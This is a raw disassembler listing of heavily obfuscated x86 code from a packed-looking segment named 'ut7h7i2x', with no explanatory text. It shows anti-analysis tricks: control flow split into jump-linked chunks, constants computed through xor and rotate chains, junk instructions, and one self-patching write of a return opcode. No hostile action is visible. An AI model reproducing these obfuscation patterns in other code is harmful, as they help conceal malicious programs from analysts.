mov edx, [esp]
call sub_4566A1
loc_441004: ; CODE XREF: ut7h7i2x:004467ECj
jmp loc_4441AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_441009: ; CODE XREF: sub_45742F-12DC6j
test ebx, 3FD7EE79h
jmp loc_43CA4F
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
loc_441014: ; CODE XREF: ut7h7i2x:0045A00Ej
jnz loc_44A7C1
; =============== S U B R O U T I N E =======================================
sub_44101A proc near ; CODE XREF: sub_44FC60+8569p
; FUNCTION CHUNK AT 0044012B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004441B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044566E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446FBC SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044971B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C074 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045189F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00457050 SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
add ecx, 4DF03DCFh
add ecx, ebp
push eax
jmp loc_4441B6
sub_44101A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44102C proc near ; CODE XREF: ut7h7i2x:0044476Cp
; ut7h7i2x:00448412j
; FUNCTION CHUNK AT 00446579 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A305 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
add edx, 6A09995Ah
mov [edx], eax
jmp loc_44A305
sub_44102C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44103D: ; CODE XREF: ut7h7i2x:loc_4478C1j
mov edx, [edx]
or edx, edx
jnz loc_4527A6
jmp loc_43A696
; ---------------------------------------------------------------------------
loc_44104C: ; CODE XREF: ut7h7i2x:00451AA3j
jl loc_44833D
; START OF FUNCTION CHUNK FOR sub_44FF0A
loc_441052: ; CODE XREF: sub_44FF0A+1j
jmp loc_456783
; END OF FUNCTION CHUNK FOR sub_44FF0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A030
loc_441057: ; CODE XREF: sub_44A030+17j
jmp nullsub_620
; END OF FUNCTION CHUNK FOR sub_44A030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447B48
loc_44105C: ; CODE XREF: sub_447B48+10j
jmp loc_44329B
; END OF FUNCTION CHUNK FOR sub_447B48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45812E
loc_441061: ; CODE XREF: sub_45812E-111A9j
jmp sub_4587DD
; END OF FUNCTION CHUNK FOR sub_45812E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_441066: ; CODE XREF: sub_43B005+Cj
; sub_43B7F7:loc_43E3B7j
jmp nullsub_106
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
push eax
sub esi, eax
xchg ebp, ebx
ror ebp, 9
jmp loc_44833C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_441078: ; CODE XREF: sub_4417AF+D098j
jz loc_43D254
jmp loc_441B4D
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
shr edx, 12h
pushf
add edx, ebx
; START OF FUNCTION CHUNK FOR sub_4512E6
loc_441089: ; CODE XREF: sub_4512E6:loc_45AD04j
add esi, 0D03CDF80h
xchg esi, [esp+0]
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_4512E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_441097: ; CODE XREF: sub_43A513:loc_43F0D6j
jz loc_43B24D
jmp loc_441F5E
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
jmp ds:off_41D0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_4410A8: ; CODE XREF: sub_455060+4A00j
jmp loc_449BA7
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_4410AD: ; CODE XREF: sub_45341C+5E08j
jmp loc_441CA5
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_4410B2: ; CODE XREF: sub_446ACE:loc_44009Bj
; ut7h7i2x:00450072j ...
push offset sub_455239
jmp loc_449FAB
; END OF FUNCTION CHUNK FOR sub_446ACE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452802
loc_4410BC: ; CODE XREF: sub_452802:loc_43C03Aj
mov edx, ebx
pop ebx
adc ecx, esi
jmp loc_455E40
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
sbb edx, 0AF0BCB6h
jmp sub_43C1E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452802
loc_4410D1: ; CODE XREF: sub_452802:loc_455E40j
pop ecx
loc_4410D2: ; CODE XREF: sub_43CFB6:loc_45200Aj
xchg edx, [esp-8+arg_4]
call sub_44C791
; END OF FUNCTION CHUNK FOR sub_452802
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_4410DA: ; CODE XREF: sub_44DF79-11E49j
jz loc_43F989
jmp loc_43A04D
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
loc_4410E5: ; CODE XREF: ut7h7i2x:loc_43A696j
jz loc_44DE6B
jmp loc_44BA8D
; ---------------------------------------------------------------------------
mov eax, [esp]
call sub_454196
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452BE9
loc_4410F9: ; CODE XREF: sub_452BE9:loc_440AAAj
xor eax, 0CBC72DF3h
ror eax, 1Ch
xor eax, 0A98B21DAh
add eax, 0AC1EB2EAh
jmp loc_43EF5D
; END OF FUNCTION CHUNK FOR sub_452BE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_441113: ; CODE XREF: sub_441765:loc_44AD4Dj
rol eax, 9
jmp loc_439DDB
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8EC
loc_44111B: ; CODE XREF: sub_45A8ECj
push 1A1FDD96h
pop eax
xor eax, 0A5205C89h
jnz loc_44ACAE
loc_44112D: ; CODE XREF: sub_448321-BAA6j
jmp loc_44E9B8
; END OF FUNCTION CHUNK FOR sub_45A8EC
; ---------------------------------------------------------------------------
test esi, ecx
loc_441134: ; CODE XREF: ut7h7i2x:loc_43B04Dj
jmp loc_443DAB
; ---------------------------------------------------------------------------
loc_441139: ; DATA XREF: sub_452FE5+8o
add eax, 0D6E854Ah
mov eax, [eax]
popf
jmp loc_451F9D
; ---------------------------------------------------------------------------
loc_441147: ; CODE XREF: ut7h7i2x:00451224j
add esp, 0FFFFFFCCh
lea eax, nullsub_502
mov byte ptr [eax], 0C3h
jmp loc_43BF5B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_441159: ; CODE XREF: sub_4489DF+1072Dj
jmp loc_44C12F
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_44115E: ; CODE XREF: sub_4503C3:loc_439D89j
; ut7h7i2x:00439DA2j
and ebx, 476DBE10h
or ebx, 164B235Ch
and ebx, 0F2DD6A9Ah
jnz loc_4405B0
rol eax, 3
jmp loc_448F68
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44117E: ; CODE XREF: sub_43A556:loc_45A22Dj
add eax, ebp
add eax, 0B8FE93EAh
push offset loc_44AB53
jmp loc_458BD0
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
test esi, ebx
jmp loc_4493BA
; ---------------------------------------------------------------------------
adc ebp, 0FED130F7h
xor ebx, ebp
jmp sub_4590CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D989
loc_4411A4: ; CODE XREF: sub_43D989+533Dj
mov ebp, esp
push ebp
mov ebp, ecx
push offset loc_43A9B2
jmp nullsub_46
; END OF FUNCTION CHUNK FOR sub_43D989
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4411B3: ; CODE XREF: sub_44D1F0:loc_43D073j
jl loc_43F165
push ebx
jmp loc_43F164
; END OF FUNCTION CHUNK FOR sub_44D1F0
; =============== S U B R O U T I N E =======================================
sub_4411BF proc near ; CODE XREF: ut7h7i2x:004457D1p
; ut7h7i2x:0044A951j
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043CF91 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00445088 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446E04 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E9C0 SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
push edx
push eax
push edi
jmp loc_44E9C0
sub_4411BF endp
; ---------------------------------------------------------------------------
locret_4411CB: ; CODE XREF: ut7h7i2x:0043F412j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DE22
loc_4411CC: ; CODE XREF: sub_43DE22+12D12j
jnz loc_44F094
; END OF FUNCTION CHUNK FOR sub_43DE22
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_4411D2: ; CODE XREF: sub_44B45E+D4EBj
jmp loc_43D5F1
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45413B
loc_4411D7: ; CODE XREF: sub_45413B:loc_454142j
jmp sub_456520
; END OF FUNCTION CHUNK FOR sub_45413B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_4411DC: ; CODE XREF: sub_442AD1+10BBFj
jmp loc_44F8D6
; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
pop ecx
not ebx
push 78B174ECh
jmp loc_44F094
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B526
loc_4411EE: ; CODE XREF: sub_44B526+C513j
call sub_4589E0
; END OF FUNCTION CHUNK FOR sub_44B526
; START OF FUNCTION CHUNK FOR sub_440944
loc_4411F3: ; CODE XREF: sub_440944-12FBj
jmp loc_44BAF4
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
loc_4411F8: ; CODE XREF: ut7h7i2x:0043D847j
or ecx, ds:4000FBh
xor ecx, 0AE239483h
add ecx, 0AF741C59h
xchg ecx, [esp]
jmp loc_457170
; ---------------------------------------------------------------------------
aQh1cd db 'Qh1cD',0 ; DATA XREF: sub_439BF8+4C5Eo
; ---------------------------------------------------------------------------
jmp locret_44BCBF
; ---------------------------------------------------------------------------
loc_44121D: ; DATA XREF: sub_4529E0-1909Bo
pop edx
; START OF FUNCTION CHUNK FOR sub_44B789
loc_44121E: ; CODE XREF: sub_44B789:loc_457FABj
rol eax, 16h
push edx
push 5EDF5C04h
xchg ebx, [esp+8+var_8]
mov edx, ebx
pop ebx
sub edx, 0B0B1EF05h
loc_441233: ; CODE XREF: ut7h7i2x:loc_444B26j
jmp loc_454BD6
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
sbb esi, ebp
jmp sub_44E2AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_441240: ; CODE XREF: sub_4402A5+134B5j
jmp loc_44338B
; END OF FUNCTION CHUNK FOR sub_4402A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_441245: ; CODE XREF: sub_44E5AB-43A7j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_44E5AB
; =============== S U B R O U T I N E =======================================
sub_44124A proc near ; CODE XREF: sub_43A218+FAFDp
; ut7h7i2x:0044D556j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043AB2E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444A73 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C2C7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C4AB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045370E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456FC3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457DDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C85 SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
call sub_43CA2D
or eax, eax
jnz loc_43AB2E
jmp loc_45370E
sub_44124A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_441260: ; CODE XREF: sub_459B58:loc_444535j
jp loc_4430EA
loc_441266: ; CODE XREF: sub_459B58:loc_43D08Cj
mov eax, 0CF0182F6h
push ecx
push offset sub_449AC2
jmp nullsub_400
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
test al, al
jz loc_446390
jmp loc_441AF3
; =============== S U B R O U T I N E =======================================
sub_441283 proc near ; CODE XREF: sub_451B63j
; DATA XREF: sub_43DD17:loc_451B59o
mov eax, [eax]
mov ds:dword_43A7A8, eax
xor eax, eax
mov ds:dword_43A79C, eax
sub_441283 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_441291: ; CODE XREF: sub_45215F-16F7Ej
; sub_43DD17+Bj ...
jns loc_44E141
cmp ds:dword_43A7A8, 0
push offset loc_44E122
jmp nullsub_38
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_4412A8: ; CODE XREF: sub_45341C+5E02j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43E3B7
jmp loc_43D2B9
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_4412BC: ; CODE XREF: sub_45633E:loc_443931j
mov eax, [eax]
push ecx
push 6DC4872h
pop ecx
xor ecx, 14066513h
loc_4412CB: ; CODE XREF: sub_446320:loc_454423j
jmp loc_4487CD
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
loc_4412D0: ; DATA XREF: sub_4456F4:loc_43C3F1o
popf
mov al, [eax]
jns loc_450907
push offset loc_441B99
jmp locret_43B814
; ---------------------------------------------------------------------------
loc_4412E3: ; CODE XREF: ut7h7i2x:loc_456322j
push edx
call sub_45499E
push 740FEFBEh
pop eax
sub eax, 8F764E9Eh
rol eax, 13h
xor eax, 0C14509E8h
add eax, 628DA75h
jmp loc_45AC03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_441309: ; CODE XREF: sub_44445F:loc_4400E4j
call sub_43BA9E
loc_44130E: ; CODE XREF: ut7h7i2x:0045A98Cj
jmp loc_453445
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
loc_441313: ; CODE XREF: ut7h7i2x:00445E6Dj
jmp loc_44592A
; ---------------------------------------------------------------------------
jg loc_4428C3
sub eax, 9FC6E45Ch
jmp sub_4585B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_441329: ; CODE XREF: sub_44F43B-76F5j
xor ebp, esi
sub edx, 44E32D19h
loc_441331: ; CODE XREF: sub_44F43B:loc_456958j
push 8D326731h
xchg ebp, [esp+0]
mov eax, ebp
pop ebp
sub eax, 921BDE64h
jmp loc_44B2EB
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_441347: ; CODE XREF: sub_439BD1:loc_4499BEj
jnz loc_4510B8
jmp loc_453A5A
; END OF FUNCTION CHUNK FOR sub_439BD1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_268. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_441353: ; CODE XREF: ut7h7i2x:0044067Bj
jmp loc_43D529
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_441358: ; CODE XREF: sub_445188+878Ej
pop esi
jmp loc_4524C9
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
loc_44135E: ; CODE XREF: ut7h7i2x:00449AA2j
; ut7h7i2x:00452DB6j
rol edi, 12h
call sub_43A0DA
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_441366: ; CODE XREF: sub_44DD56+10j
xor edi, 0FD5697AAh
and edi, 32C1AD93h
test edi, 200000h
jmp loc_453436
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
loc_44137D: ; CODE XREF: ut7h7i2x:loc_43C914j
jnz loc_439955
jmp loc_44DACB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CD2
loc_441388: ; CODE XREF: sub_458CD2+14j
pop eax
or eax, 0D0852709h
sub eax, 47A7D844h
and eax, 5B7B4045h
jmp loc_4508EC
; END OF FUNCTION CHUNK FOR sub_458CD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_4413A0: ; CODE XREF: sub_45742F-1CE50j
jnb loc_449F61
pop ebp
jmp loc_44DF9E
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
and ebx, esi
jmp loc_450323
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_4413B3: ; CODE XREF: sub_449B8E:loc_459FC0j
jz loc_4494E9
jmp loc_445725
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
sbb ebx, esi
jmp sub_449E81
; ---------------------------------------------------------------------------
loc_4413C5: ; CODE XREF: ut7h7i2x:loc_446CB1j
jnz loc_44C6EE
xchg eax, [ebx]
push edx
xchg ecx, esi
xor ebp, eax
jmp loc_44C6EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447185
loc_4413D7: ; CODE XREF: sub_447185+10j
push 0D1E96292h
pop edi
or edi, 508AE471h
rol edi, 18h
add edi, ds:4000F4h
jb loc_43D318
adc esi, 1924CEh
adc ebx, 6155889Fh
jmp loc_43D318
; END OF FUNCTION CHUNK FOR sub_447185
; ---------------------------------------------------------------------------
pop edx
pop eax
push eax
push 0E4BD6C4Fh
pop eax
jmp loc_447BFB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C943
loc_441411: ; CODE XREF: sub_43C943:loc_43F455j
push offset loc_4507A3
jmp nullsub_39
; END OF FUNCTION CHUNK FOR sub_43C943
; ---------------------------------------------------------------------------
loc_44141B: ; CODE XREF: ut7h7i2x:00439985j
push ebx
mov ebx, eax
xchg ebx, [esp]
push eax
push 989D16A6h
pop eax
sub eax, 0FEF0D74Ch
cmp eax, 0A342A689h
jmp loc_44584B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CB0D
loc_441439: ; CODE XREF: sub_43CB0D:loc_43E375j
adc edx, 801F5AFEh
sub edx, eax
jmp loc_457861
; END OF FUNCTION CHUNK FOR sub_43CB0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_441446: ; CODE XREF: sub_4431FF:loc_44E218j
jnz loc_459971
jmp loc_44D5A0
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
loc_441451: ; CODE XREF: ut7h7i2x:004424A5j
jz loc_44BB1B
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_441457: ; CODE XREF: sub_43EF73+1554j
jmp loc_44543B
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
dd 8A0F3089h, 24BDh, 0E909C8C1h, 0A6AFh, 0F5E28B0Fh, 1C87FFFFh
dd 0C0815B24h, 0EAB90E68h, 0E9240487h, 12907h, 0E0D11689h
dd 0EF1FE9h
db 0
; ---------------------------------------------------------------------------
loc_44148D: ; DATA XREF: sub_44825D-B26Fo
cmp al, 0A4h
jz loc_44A846
jmp loc_453312
; ---------------------------------------------------------------------------
loc_44149A: ; CODE XREF: ut7h7i2x:00452734j
; ut7h7i2x:loc_45491Fj
and esi, 9195F939h
add esi, 7F3C3907h
mov [esi], eax
pop esi
lea eax, nullsub_364
call sub_458F07
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_4414B4: ; CODE XREF: sub_44EB88+C22Aj
jmp loc_44AB8C
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44ED9F
loc_4414B9: ; CODE XREF: sub_44ED9F+9j
jmp sub_447917
; END OF FUNCTION CHUNK FOR sub_44ED9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45002D
loc_4414BE: ; CODE XREF: sub_45002D+Aj
push edx
push ecx
mov ecx, edx
push offset sub_43DD32
jmp loc_43B81F
; END OF FUNCTION CHUNK FOR sub_45002D
; =============== S U B R O U T I N E =======================================
sub_4414CC proc near ; CODE XREF: ut7h7i2x:0044A380j
; ut7h7i2x:0044CD31p
; FUNCTION CHUNK AT 00444019 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
pop eax
push edi
push 0B584C15Bh
pop edi
and edi, 3D6AED67h
push offset sub_43D75E
jmp loc_444019
sub_4414CC endp
; =============== S U B R O U T I N E =======================================
sub_4414E8 proc near ; CODE XREF: ut7h7i2x:00450097j
; sub_43FD68:loc_455918p
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, eax
xchg ebp, [esp+0]
call sub_44C95C
push offset loc_44F030
jmp nullsub_40
sub_4414E8 endp
; =============== S U B R O U T I N E =======================================
sub_441501 proc near ; DATA XREF: sub_44D683+D5CCo
; FUNCTION CHUNK AT 0043FF4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453633 SIZE 00000027 BYTES
push edx
call sub_444E04
push 79890608h
pop eax
and eax, 8F7FAC09h
jmp loc_43FF4D
sub_441501 endp
; ---------------------------------------------------------------------------
loc_441518: ; CODE XREF: ut7h7i2x:loc_441DC5j
; ut7h7i2x:00441DD4j
xor esi, 0B4B6A2BCh
add eax, esi
pop esi
call sub_44ACC5
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_441526: ; CODE XREF: sub_44E5DC+7j
jmp loc_454A90
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
loc_44152B: ; CODE XREF: ut7h7i2x:0043EC2Ej
jmp locret_459E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_441530: ; CODE XREF: sub_444A08-9838j
adc edx, ebp
loc_441532: ; CODE XREF: ut7h7i2x:loc_44FAFAj
xchg ebp, [edi]
loc_441534: ; CODE XREF: sub_444A08:loc_43B1C8j
sub eax, 10DCE0D9h
rol eax, 0Ah
add eax, 0D0725B99h
jmp loc_456194
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
loc_441548: ; CODE XREF: ut7h7i2x:loc_452A5Fj
adc edi, edx
jmp loc_448B73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44154F: ; CODE XREF: sub_444A12-5C3Fj
sub eax, 0EDBED6Ah
xor eax, 55201566h
call sub_43AA94
push ecx
jmp loc_44CD84
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_441566: ; CODE XREF: sub_449700-7C6Bj
jge loc_448EBD
sub edx, 334B4952h
jmp loc_457378
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_441577: ; CODE XREF: sub_44865D+4FDAj
push 74AC4CD8h
loc_44157C: ; CODE XREF: sub_44865D+4FD3j
add eax, 0B7780D74h
xchg eax, [esp+0]
jmp loc_439216
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jmp loc_4555F6
; ---------------------------------------------------------------------------
loc_441593: ; DATA XREF: ut7h7i2x:0043FB90o
call sub_44261F
mov eax, 0B2EE4EE4h
call sub_43AA94
push esi
sbb esi, 0C365F78Eh
jmp loc_4509D2
; ---------------------------------------------------------------------------
push ebp
call sub_448630
; START OF FUNCTION CHUNK FOR sub_439B67
loc_4415B4: ; CODE XREF: sub_439B67+1B88Fj
jmp loc_450949
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441C6B
loc_4415B9: ; CODE XREF: sub_441C6B+7j
jmp loc_4564E8
; END OF FUNCTION CHUNK FOR sub_441C6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_4415BE: ; CODE XREF: sub_43CFB6-1B84j
jmp loc_440750
; END OF FUNCTION CHUNK FOR sub_43CFB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4533DE
loc_4415C3: ; CODE XREF: sub_4533DE:loc_44F4F4j
xor eax, 0BFDA15A3h
test eax, 400000h
loc_4415CF: ; CODE XREF: sub_44A3BB:loc_44DB09j
jmp loc_43A77B
; END OF FUNCTION CHUNK FOR sub_4533DE
; ---------------------------------------------------------------------------
loc_4415D4: ; CODE XREF: ut7h7i2x:0043A3B5j
mov ebp, 83CABFADh
loc_4415D9: ; CODE XREF: ut7h7i2x:loc_445B7Ej
call sub_44E2C4
test al, al
jz loc_45A547
jmp loc_4584CB
; =============== S U B R O U T I N E =======================================
sub_4415EB proc near ; CODE XREF: ut7h7i2x:0043DAF5p
; ut7h7i2x:00453ED6j
; FUNCTION CHUNK AT 00453375 SIZE 0000002B BYTES
xchg ebx, [esp+0]
pop ebx
add edx, 9A7F5521h
push ebx
pushf
jmp loc_453375
sub_4415EB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
adc eax, 0B138BBF2h
test eax, edi
jmp loc_447AD0
; ---------------------------------------------------------------------------
xor edi, 1CD9B82Fh
jmp loc_43A23A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_441614: ; CODE XREF: sub_44B122:loc_44B94Aj
; ut7h7i2x:loc_453B25j
xchg ebp, [esp+2CCh+var_2CC]
mov eax, [ebp+arg_0]
push ebx
mov ebx, eax
jmp loc_43D9E1
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_441622: ; CODE XREF: sub_44EB88-B2Ej
shr edx, 12h
jnp loc_44BAE9
loc_44162B: ; CODE XREF: sub_44EB88:loc_43C25Cj
mov eax, 10h
call sub_459036
push ebx
push 3238E805h
pop ebx
jmp loc_44EF87
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
popf
jmp loc_459013
; ---------------------------------------------------------------------------
adc edi, esi
jmp loc_453473
; ---------------------------------------------------------------------------
loc_44164E: ; CODE XREF: ut7h7i2x:loc_4504BDj
jnb loc_44EBF5
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_441654: ; CODE XREF: sub_439BD1+1D4AFj
mov ebx, 7DA12F26h
jmp loc_44ED29
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_44165E: ; CODE XREF: ut7h7i2x:00439C7Ej
mov edx, ebp
xchg edx, [esp]
mov ebp, esp
add esp, 0FFFFFEF4h
push 0FFh
lea eax, [ebp-10Ch]
push eax
jmp loc_440C17
; ---------------------------------------------------------------------------
mov edi, [ebp+0]
jmp sub_44DA5B
; ---------------------------------------------------------------------------
push 37B28AC9h
pop edx
sub edx, 456BEC41h
or edx, 0D1EB9B6Ch
xor edx, 58984C1Dh
jmp loc_441DB6
; ---------------------------------------------------------------------------
mov eax, 3FFC3041h
push edx
mov edx, esi
xchg edx, [esp]
push 83962E20h
pop esi
xor esi, 3F0DDBB8h
jnz loc_44353E
; START OF FUNCTION CHUNK FOR sub_448215
loc_4416BE: ; CODE XREF: sub_448215+4j
jmp loc_451B25
; END OF FUNCTION CHUNK FOR sub_448215
; ---------------------------------------------------------------------------
loc_4416C3: ; CODE XREF: ut7h7i2x:00440ED8j
sbb ebx, 0C99AFAA4h
; =============== S U B R O U T I N E =======================================
sub_4416C9 proc near ; CODE XREF: sub_449AD9+685Ap
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043DE63 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
xchg edi, [esp-4+arg_0]
jmp loc_43DE63
sub_4416C9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4416D5: ; CODE XREF: ut7h7i2x:loc_459C6Cj
cmp dword ptr [ebp-10Ch], 6D676552h
jnz loc_442C9A
jmp loc_441CD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_4416EA: ; CODE XREF: sub_444AA3j
mov eax, ds:dword_44EE44
or eax, eax
jnz loc_442589
jmp loc_453153
